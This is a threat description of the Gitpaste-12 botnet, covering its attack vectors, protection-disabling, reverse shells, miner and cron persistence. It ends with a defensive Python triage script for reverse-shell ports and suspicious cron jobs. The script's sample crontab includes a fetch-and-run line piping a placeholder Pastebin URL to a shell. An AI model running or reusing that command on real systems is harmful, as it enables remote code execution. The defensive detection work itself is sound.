Gitpaste-12 Botnet Description
Gitpaste-12 is a botnet and a highly sophisticated worm equipped with a wide range of threatening capabilities. The name Gitpaste-12 was derived from the fact that certain components of the threat were hosted on legitimate services such as GitHub and Pastebin. The number 12 denotes the 12 different attack vectors exploited by the worm: 11 vulnerabilities and a Telnet brute-force function. Two of the vulnerabilities target Apache Struts and MongoDB, two widely used open-source components. The malware is designed to infect Linux-based x86 servers as well as Linux ARM- and MIPS-based Internet of Things (IoT) devices.
Because the main payload of the Gitpaste-12 botnet was hosted on genuine sites like GitHub and Pastebin, blocking the malware's Command-and-Control (C2, C&C) infrastructure within the compromised network is that much harder. It should be noted that Gitpaste-12 was present on GitHub for several months, starting in July 2020, but was removed after being discovered by researchers at Juniper Threat Labs. While this effectively stops the botnet's propagation, the hackers can establish their C2 infrastructure elsewhere, a possibility that is quite likely because Gitpaste-12 is under active development, as evidenced by several factors.
Once inside the targeted device, Gitpaste-12 disables multiple layers of protective anti-malware measures: it deactivates firewall rules, AppArmor, SELinux, etc. It then allows the hackers to execute reverse shell commands using TCP ports 30004 and 30005, as observed on some of the infected systems. Gitpaste-12 has separate modules responsible for dropping a Monero cryptocurrency miner on the compromised devices, executing a Telnet-based script for brute-force attacks against Linux servers and IoT devices, establishing persistence through a cron job, etc. The worm can propagate itself and infect other machines by choosing a random /8 CIDR and trying all addresses within that range.
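As an added defender-side example (not code from the original write-up or from the malware), the following Python triages a host for the two host-observable indicators the description gives: TCP sessions on the reported reverse-shell ports 30004/30005 in `ss -tn` output, and cron jobs that fetch and execute content from Pastebin or GitHub. The sample input is constructed, and the domain strings used for the cron check are an assumption, not indicators from the page.

```python
"""Triage checks for the Gitpaste-12 behaviour described above (constructed sample input)."""
import re

# Ports the write-up reports for the reverse shell.
REVERSE_SHELL_PORTS = {30004, 30005}
# Assumed hostnames for the paste/code-hosting sites named in the write-up.
PAYLOAD_HOSTS = ("pastebin.com", "github.com", "githubusercontent.com")

# Parses one data line of `ss -tn`: State Recv-Q Send-Q Local:Port Peer:Port
SS_LINE = re.compile(r"^(ESTAB|SYN-SENT)\s+\d+\s+\d+\s+(\S+):(\d+)\s+(\S+):(\d+)")


def suspicious_connections(ss_output):
    """Return (local, peer) pairs for sessions touching a reported reverse-shell port.

    Both ends are checked: the shell may listen locally or dial out to the operator."""
    hits = []
    for line in ss_output.splitlines():
        m = SS_LINE.match(line)
        if not m:
            continue  # header line or a state we do not care about
        _state, laddr, lport, paddr, pport = m.groups()
        if int(lport) in REVERSE_SHELL_PORTS or int(pport) in REVERSE_SHELL_PORTS:
            hits.append((f"{laddr}:{lport}", f"{paddr}:{pport}"))
    return hits


def suspicious_cron_entries(crontab_text):
    """Return crontab lines that download from one of PAYLOAD_HOSTS with curl or wget."""
    fetch = re.compile(r"\b(curl|wget)\b")
    hits = []
    for line in crontab_text.splitlines():
        entry = line.strip()
        if not entry or entry.startswith("#"):
            continue
        if fetch.search(entry) and any(host in entry for host in PAYLOAD_HOSTS):
            hits.append(entry)
    return hits


# Constructed sample data (documentation-range IPs, placeholder paste URL).
SAMPLE_SS = """State  Recv-Q Send-Q Local Address:Port   Peer Address:Port
ESTAB  0      0      10.0.0.5:30004       198.51.100.7:51322
ESTAB  0      0      10.0.0.5:22          10.0.0.9:40112
ESTAB  0      0      10.0.0.5:43210       203.0.113.4:30005
"""
SAMPLE_CRON = """# constructed sample crontab
*/5 * * * * curl -s https://pastebin.com/raw/PLACEHOLDER | sh
0 3 * * * /usr/bin/certbot renew
"""
```

Run the two functions over live `ss -tn` and `crontab -l` output on a suspect host; a hit on either is a reason to isolate the machine and capture its process list and cron state before cleanup.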